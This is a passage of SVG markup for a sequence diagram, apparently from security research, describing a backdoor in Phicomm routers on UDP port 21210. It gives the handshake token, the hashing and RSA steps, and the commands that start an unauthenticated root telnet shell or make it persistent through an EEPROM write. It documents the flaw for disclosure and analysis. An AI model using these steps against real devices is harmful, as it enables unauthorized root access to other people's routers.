or%3A%23blue%3ERAW_PERM_KEY%3C%2Fcolor%3E%2C%20%22%3Ccolor%3A%23purple%3E**%25s**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2BPERM%3C%2Fcolor%3E%22%2C%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E**)**%2C%5Cnrespectively.%20%5Cn%5Cn(Note%20the%20format%20string.)%0A%0Aactivate%20Server%20%23yellow%0A%0AServer-%3EServer%3ACompute%20the%20**MD5**%20hashes%20of%20%3Ccolor%3A%23blue%3ERAW_TEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3ERAW_PERM_KEY%3C%2Fcolor%3E%5Cnand%20store%20the%2016-byte%20results%20as%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%2C%5Cnrespectively.%0A%0AClient--%3EClient%3A%20The%20Client%20is%20now%20expected%20to%20append%20one%20of%20two%5Cnsuffixes%20to%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%3A%5Cn%5Cn-%20%22%3Ccolor%3A%23red%3E%2BTEMP%3C%2Fcolor%3E%22%2C%20to%20launch%20a%20**telnetd**%20session%20that%20will%5Cn%20%20%20last%20until%20the%20router%20is%20rebooted%2C%20%2F%2For%2F%2F%5Cn-%20%20%22%3Ccolor%3A%23red%3E%2BPERM%3C%2Fcolor%3E%22%2C%20to%20write%20a%20flag%20to%20a%20physical%20volume%2C%5Cn%20%20%20which%20the%20**telnetd_startup**%20daemon%20will%20check%20for%5Cn%20%20%20when%20the%20system%20is%20rebooted%2C%20and%20launch%20**telnetd**%5Cn%20%20%20if%20it%20finds%20it.%5Cn%5CnStore%20the%20result%20in%20%3Ccolor%3A%23blue%3ERAW_KEY%3C%2Fcolor%3E.%0A%0Aactivate%20Client%20%23yellow%0A%0AClient--%3EClient%3A%20Compute%20the%20**MD5**%20hash%20of%20%3Ccolor%3A%23blue%3ERAW_KEY%3C%2Fcolor%3E%2C%20and%20store%5Cnthe%20result%20in%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E.%0A%0Aactivate%20Client%20%23red%0A%0AClient--%3EServer%3A%20Send%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20to%20Server%0A%0Aactivate%20Server%20%23red%0A%0AServer--%3EServer%3A%20**If**%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20matches%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20then%5Cncall%20**system(%22%3Ccolor%3A%23red%3Etelnetd%20-l%20%2Fbin%2Flogin.sh%3C%2Fcolor%3E%22)**%2C%5Cnlaunching%20an%20unencrypted%20**telnetd**%20shell%5Cnas%20**root**.%20No%20credentials%20are%20required%20to%5Cnlog%20into%20this%20shell.%5Cn%5Cn**If**%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20matches%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%20then%5Cncall%20**system(%22%3Ccolor%3A%23red%3Eiwpriv%20ra0%20e2p%2026%3D7010%3C%2Fcolor%3E%22)**%2C%5Cnwriting%20the%20bytes%20%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E7010%3C%2Fcolor%3E%5D%20to%20**EEPROM**%2C%5Cnat%20offset%20%3Ccolor%3A%23darkgreen%3E0x26%3C%2Fcolor%3E%20(virtual%20address%20%3Ccolor%3A%23darkgreen%3E0x40026%3C%2Fcolor%3E).%20This%5Cncode%20will%20instruct%20the%20**telnetd_startup**%20daemon%5Cnto%20launch%20**telnetd%20-l%20%2Fbin%2Flogin.sh**%20on%20boot.%0A</desc><defs/><g><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g><rect fill="white" stroke="none" x="0" y="0" width="1111" height="1991"/></g><g><text fill="black" stroke="none" font-family="sans-serif" font-size="16.5pt" font-style="normal" font-weight="normal" text-decoration="normal" x="273.8413135509609" y="22.6179738" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Phicomm's Encrypted Backdoor on UDP Port 21210</text></g><g/><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 45.149658982 88.511670804 L 45.149658982 1991.4371998440001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="11.598960923076923,5.0262164"/><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 552.1357946608085 88.511670804 L 552.1357946608085 1991.4371998440001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="11.598960923076923,5.0262164"/></g><g><path fill="none" stroke="none"/><g><path fill="white" stroke="black" paint-order="fill stroke markers" d=" M 7.5393246000000005 47.799317964000004 L 82.759993364 47.799317964000004 L 82.759993364 88.511670804 L 7.5393246000000005 88.511670804 L 7.5393246000000005 47.799317964000004 Z" stroke-miterlimit="10" stroke-width="2.4125838720000004" stroke-dasharray=""/></g><g><g/><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="23.899658982" y="73.43302160400002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Client</text></g><path fill="none" stroke="none"/><g><path fill="white" stroke="black" paint-order="fill stroke markers" d=" M 511.7087927220458 47.799317964000004 L 592.5627965995712 47.799317964000004 L 592.5627965995712 88.511670804 L 511.7087927220458 88.511670804 L 511.7087927220458 47.799317964000004 Z" stroke-miterlimit="10" stroke-width="2.4125838720000004" stroke-dasharray=""/></g><g><g/><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="528.0691271040458" y="73.43302160400002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Server</text></g></g><g><path fill="brown" stroke="black" paint-order="fill stroke markers" d=" M 37.610334382 96.050995404 L 52.688983582 96.050995404 L 52.688983582 1976.3585506440002 L 37.610334382 1976.3585506440002 L 37.610334382 96.050995404" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="brown" stroke="black" paint-order="fill stroke markers" d=" M 544.5964700608085 168.42851156400002 L 559.6751192608085 168.42851156400002 L 559.6751192608085 1976.3585506440002 L 544.5964700608085 1976.3585506440002 L 544.5964700608085 168.42851156400002" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 552.1357946608085 290.565570084 L 567.2144438608085 290.565570084 L 567.2144438608085 362.943086244 L 552.1357946608085 362.943086244 L 552.1357946608085 290.565570084" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="salmon" stroke="black" paint-order="fill stroke markers" d=" M 45.149658982 545.394741564 L 60.228308182 545.394741564 L 60.228308182 1976.3585506440002 L 45.149658982 1976.3585506440002 L 45.149658982 545.394741564" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="salmon" stroke="black" paint-order="fill stroke markers" d=" M 552.1357946608085 664.516070244 L 567.2144438608085 664.516070244 L 567.2144438608085 1976.3585506440002 L 552.1357946608085 1976.3585506440002 L 552.1357946608085 664.516070244" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 559.6751192608085 756.4958303640001 L 574.7537684608085 756.4958303640001 L 574.7537684608085 1976.3585506440002 L 559.6751192608085 1976.3585506440002 L 559.6751192608085 756.4958303640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="pink" stroke="black" paint-order="fill stroke markers" d=" M 567.2144438608085 878.6328888840001 L 582.2930930608085 878.6328888840001 L 582.2930930608085 1976.3585506440002 L 567.2144438608085 1976.3585506440002 L 567.2144438608085 878.6328888840001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 52.688983582 920.853106644 L 67.76763278199999 920.853106644 L 67.76763278199999 1976.3585506440002 L 52.688983582 1976.3585506440002 L 52.688983582 920.853106644" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="pink" stroke="black" paint-order="fill stroke markers" d=" M 60.22830818199999 1150.048574484 L 75.306957382 1150.048574484 L 75.306957382 1976.3585506440002 L 60.22830818199999 1976.3585506440002 L 60.22830818199999 1150.048574484" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="yellow" stroke="black" paint-order="fill stroke markers" d=" M 574.7537684608086 1287.264282204 L 589.8324176608086 1287.264282204 L 589.8324176608086 1976.3585506440002 L 574.7537684608086 1976.3585506440002 L 574.7537684608086 1287.264282204" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="yellow" stroke="black" paint-order="fill stroke markers" d=" M 67.767632782 1591.852996044 L 82.84628198200001 1591.852996044 L 82.84628198200001 1976.3585506440002 L 67.767632782 1976.3585506440002 L 67.767632782 1591.852996044" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="red" stroke="black" paint-order="fill stroke markers" d=" M 75.306957382 1668.7541069640001 L 90.385606582 1668.7541069640001 L 90.385606582 1976.3585506440002 L 75.306957382 1976.3585506440002 L 75.306957382 1668.7541069640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="red" stroke="black" paint-order="fill stroke markers" d=" M 582.2930930608086 1710.974324724 L 597.3717422608086 1710.974324724 L 597.3717422608086 1976.3585506440002 L 582.2930930608086 1976.3585506440002 L 582.2930930608086 1710.974324724" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g><g><rect fill="white" stroke="none" x="177.34759304041856" y="118.668969204" width="230.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="177.34759304041856" y="133.747618404" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="177.34759304041856" y="148.826267604" width="242.59026756197144" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="179.60939042041855" y="132.239753484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send the token "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="302.4427262968834" y="132.239753484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ABCDEF1234</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="398.85939042041855" y="132.239753484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="179.60939042041855" y="147.318402684" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="179.60939042041855" y="162.397051884" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">[HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="225.2927247710045" y="162.397051884" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">41424344454631323334</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="411.9593965239342" y="162.397051884" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">]</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 52.688983582 168.42851156400002 L 532.1817155528086 168.42851156400002" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(544.5964700608085,168.42851156400002) translate(-544.5964700608085,-168.42851156400002)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 532.0309290608085 162.14574106400002 L 544.5964700608085 168.42851156400002 L 532.0309290608085 174.71128206400002 Z"/></g></g><g><g><rect fill="white" stroke="none" x="585.0575120808086" y="191.046485364" width="285.17358865648436" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="206.125134564" width="321.0736054411523" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="221.203783764" width="254.42358865648438" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="236.282432964" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="251.361082164" width="348.04025735765623" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="204.617269644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">compute MD5 hash of 128-byte buffer</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="219.695918844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">beginning with "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="707.5859796878593" y="219.695918844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">K2_COSTDOWN__VER_3.0</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="897.1193201419609" y="219.695918844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="234.774568044" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">with the rest of the bytes left null.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="249.853217244" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="264.931866444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="727.035969006707" y="264.931866444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 559.6751192608085 270.963326124 L 627.5290406608085 270.963326124 L 627.5290406608085 290.565570084 L 579.6291983688085 290.565570084" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(567.2144438608085,290.565570084) translate(-567.2144438608085,-290.565570084)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 579.7799848608086 284.282799584 L 567.2144438608085 290.565570084 L 579.7799848608086 296.848340584 Z"/></g></g><g><g><rect fill="white" stroke="none" x="123.35058511336776" y="313.183543884" width="322.8569330206506" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="123.35058511336776" y="328.26219308400005" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="123.35058511336776" y="343.340842284" width="358.123608016073" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="125.61238249336776" y="326.75432816400007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Reply with the </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="235.47905119453964" y="326.75432816400007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="439.27905424629745" y="326.75432816400007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="125.61238249336776" y="341.83297736400004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="125.61238249336776" y="356.911626564" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">[HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="171.2957168439537" y="356.911626564" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">812B50867EFB281491D8F9285D007914</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="473.49572905098495" y="356.911626564" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">]</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 552.1357946608085 362.943086244 L 65.10373809000001 362.943086244" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(52.688983582,362.943086244) translate(-52.688983582,-362.943086244)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 65.254524582 356.660315744 L 52.688983582 362.943086244 L 65.254524582 369.22585674400005 Z"/></g></g><g><g><rect fill="white" stroke="none" x="78.071376402" y="385.561060044" width="378.9402741423242" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="400.63970924399996" width="425.7402490606897" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="415.71835844399993" width="237.42358865648438" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="430.7970076439999" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="445.8756568439999" width="431.0902680388086" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="460.95430604399985" width="415.44025888353514" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="476.0329552439998" width="228.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="491.1116044439998" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="506.19025364399977" width="323.1735834112756" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="399.131844324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Produce a 32-byte-long message called </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="374.9165172878594" y="399.131844324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="414.21049352399996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">that the Server will decrypt with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="321.91650202907033" y="414.21049352399996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="496.88316157496877" y="414.21049352399996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="429.28914272399993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using the hardcoded public key.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="444.3677919239999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="459.4464411239999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">It seems that the Client is expected to encrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="427.06651118434377" y="459.4464411239999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="474.52509032399985" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">with the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="144.88317683375783" y="474.52509032399985" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PRIVATE KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="250.0998440090508" y="474.52509032399985" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> that corresponds to the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="431.81650355494924" y="474.52509032399985" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PUBLIC</text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="80.333173782" y="489.6037395239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.333173782" y="489.6037395239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hardcoded on the device.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="504.6823887239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="519.7610379239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="220.04983332789845" y="519.7610379239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="394.3164959255547" y="519.7610379239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 52.688983582 525.792497604 L 120.54290498200001 525.792497604 L 120.54290498200001 545.394741564 L 72.64306269 545.394741564" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(60.228308182,545.394741564) translate(-60.228308182,-545.394741564)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 72.793849182 539.111971064 L 60.228308182 545.394741564 L 72.793849182 551.677512064 Z"/></g></g><g><g><rect fill="white" stroke="none" x="156.10059441169236" y="568.012715364" width="292.6235894194238" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="158.36239179169235" y="581.583499644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="199.99572690521774" y="581.583499644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="374.262389502874" y="581.583499644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Server</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 60.228308182 587.614959324 L 532.1817155528086 587.614959324" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(544.5964700608085,587.614959324) translate(-544.5964700608085,-587.614959324)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 532.0309290608085 581.332188824 L 544.5964700608085 587.614959324 L 532.0309290608085 593.897729824 Z"/></g></g><g><g><rect fill="white" stroke="none" x="585.0575120808086" y="610.232933124" width="457.07358255296873" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="625.311582324" width="320.67358865648436" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="623.803717404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Decrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="650.1693079349296" y="623.803717404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="824.4359705325859" y="623.803717404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="864.9026377078789" y="623.803717404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="638.882366604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="728.8859751102226" y="638.882366604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DECRYPTED_XOR_MASK</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 559.6751192608085 644.913826284 L 627.5290406608085 644.913826284 L 627.5290406608085 664.516070244 L 579.6291983688085 664.516070244" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(567.2144438608085,664.516070244) translate(-567.2144438608085,-664.516070244)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 579.7799848608086 658.2332997440001 L 567.2144438608085 664.516070244 L 579.7799848608086 670.798840744 Z"/></g></g><g><g><rect fill="white" stroke="none" x="592.5968366808086" y="687.1340440440001" width="312.47360696703123" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="592.5968366808086" y="702.2126932440001" width="367.3069309225671" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="592.5968366808086" y="717.2913424440001" width="319.1569260588281" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="594.8586340608085" y="700.7048283240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Generate a string of 31 random, printable</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="594.8586340608085" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">characters (between ASCII codes </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="841.9252997102226" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x21</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="878.6086340608085" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="915.5419684113945" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x7e</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="951.9253035249199" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="594.8586340608085" y="730.8621267240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" 